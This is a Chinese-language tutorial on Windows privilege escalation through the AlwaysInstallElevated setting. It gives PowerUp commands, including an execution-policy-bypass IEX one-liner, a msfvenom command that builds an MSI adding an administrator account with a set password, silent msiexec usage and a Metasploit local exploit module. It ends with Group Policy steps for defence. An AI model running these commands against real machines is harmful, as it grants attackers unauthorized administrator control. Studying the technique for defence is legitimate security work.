PowerSploit PowerUp模块提权
- PowerSploit
- PowerUp
- msf
- 自动化模块
- 防御措施
- 方法
PowerSploit
PowerSploit是基于PowerShell的后渗透框架包含很多Powershell攻击脚本,它们主要用于渗透中的信息侦察、权限提升、权限维持。
GitHub下载:https://github.com/PowerShellMafia/PowerSpoloit
PowerUp
PowerUp是Privesc模块下的脚本功能强大,多用来寻找目标主机windows服务漏洞进行提权的实用脚本。
此实战中使用了Get-RegistryAlwaysInstallElevated两个模块。
检查注册表的设置,如果注册表设置就意味着MSI可以被管理员权限运行。
powershell -nop -exec bypass IEX(New-Object Net.WebClient).DownloadString('c:/PowerUp.ps1');Get-RegistryAlwaysInstallElevated
添加用户使用Write-UserAddMSI模块,会产生MSI文件。
普通用户权限运行就可以添加账户
backdoor用户成功添加。
查看管理员组是否有我们添加的用户
backdoor已经是管理员组的成员了
msf
使用msf也可以产生同样的效果
使用msfvenmo生成MSI的payload
msfvenom -p windows/adduser USER=clay PASS=0X7779@ss! -f msi > /tmp/add.msi
使用meterpreter将payload上传
msiexec常用参数
- /i 安装或配置产品
- /x卸载产品
- /quiet安静模式,无用户交互
- /q 【n】无用户界面 【b】基本页面【r】精简页面【f】完整页面
- /morestart安装完成后不重新启动
shell下执行
msiexec /i /qn /quiet c:\add.msi
clay用户成功添加
自动化模块
在msf下有自动化模块可以使用
use exploit/windows/local/always_install_elevated
获得了两个会话
防御措施
此漏洞是因为用户开启了Windows Installer特权安装功能。
方法
运行中 gpedit.msc 打开本地组策略编辑器
组策略中–计算机配置–管理模板–windows组件–windows Installer 永远以高特权进行安装:已启用
组策略中–计算机配置–用户配置–windows组件–windows Installer 永远以高特权进行安装:已启用
对照攻击方法进行防御,只要关闭AlwaysInstallElevated可以阻止他人利用MSI文件进行提权。
人生漫漫其修远兮,网安无止境。
一同前行,加油!
PowerSploit PowerUp模块提权相关推荐
- 118.网络安全渗透测试—[权限提升篇16]—[Windows MSF提权模块提权审计工具]
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一.MSF 结合漏洞审计工具进行提权 1.MSF漏洞审计模块:local_exploit_suggeste 2. ...
- CobaltStrike使用-第五篇(Bypass UAC、CVE提权、Powerup提权)
前四篇文章介绍了CS的基本使用方法和模块,以及钓鱼攻击的方法,本篇将会介绍使用CS进行提权操作 文章目录 权限提升 Bypass UAC CVE提权 PowerUp 凭证和哈希获取 Beacon 中的 ...
- 系统提权之:Windows 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Wi ...
- Cobalt Strike 提权
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关.倡导维护网络安全人人有责,共同维护网络文明和谐. Co ...
- 内网渗透常用提权方式总结
文章目录 前言 内网提权的常用方法 一.Windows系统内核溢出漏洞提权 1.手动查找系统潜在漏洞 2.使用Windows-Exploit-Suggester 3.使用sherlock 脚本 4.还 ...
- msf后渗透之文件交互指令、上传下载文件、屏幕截图、键盘记录、创建账户、音频录像和提权(上)
目录 1.文件交互指令 2.上传下载文件(windows) 3.屏幕截图(windows) 4.键盘记录(windows) 1.先启动记录keyscan_start 2.显示键盘输入内容keyscan ...
- CVE-2018-8120漏洞复现(提权)
最好用的提权漏洞CVE-2018-8120 漏洞描述 部分版本Windows系统win32k.sys组件的NtUserSetImeInfoEx()系统服务函数内部未验证内核对象中的空指针对象,普通应用 ...
- metasploit linux 提权
1.简介 Metasploit是一款开源的安全漏洞检测工具,可以帮助`安全和IT专业人士识别安全性问题,验证漏洞的 缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报.这些功能包括智能开 ...
- Meterpreter 提权
0x01 Meterpreter自动提权 1.生成后门程序 我们在kali的命令行下直接执行以下命令获得一个针对windows的反弹型木马: msfvenom -p windows/meterpret ...
最新文章
- python 示列:抓取网页所有a连接
- SQL点点滴滴_UPDATE小计
- Win10配置Tensorflow_Object_Detection_API
- Borg Maze POJ - 3026 (BFS + 最小生成树)
- 坐标转换-换带计算(附软件下载)
- npstion实现通过手机扫描二维码向电脑录入信息
- LiveGBS流媒体平台GB/T28181常见问题-海康大华宇视监控设备安防摄像头等设备注册不上来如何检查问题?
- 微信公众号首次关注自动回复图文信息
- 积分变现|积分变现如何效益最大化?信用卡积分如何快速变现?
- 【学术相关】交大博士学长:研究生计算机专业的方向选择!
- canvas制作印章
- Pygame详解(十六):cursors 模块
- 大数据营销更需要消费者洞察
- 深入理解jvm(转)
- JavaWeb学习心得总结
- 链全财经成功举办WBO第一届世界区块链高峰论坛
- EXCEL VBA 对话框MsgBox语法笔记
- AutoCAD2011免费下载AutoCAD2011安装教程(中文)
- LGO 软件静态后处理及坐标转换操作流程
- HTTP请求头X-Forwarded-For,Remote_Addr
热门文章
- 【乐绘派】Audition专业音频后期制作教程 | 3-工作区
- Lucene 3.0.0的结构遍历TokenStream的内容
- toPlainString() 、 toString()
- 论激情引领探索,探索产生成就感,成就感反馈激情之螺旋上升——大学阶段最酷的体验之软工实践
- java红包金额随机数算法_实时随机数算法(微信红包分配算法)
- 不是408,但很像408!双一流东北林业大学计算机考研改考!
- 如何将照片变漫画效果?分享两个照片变漫画小技巧
- 深入分析配置静态路由与相关命令
- SpringBoot整合CRM项目--客户管理(四)
- 数据库mysql:更新指定部门员工的工资上涨20%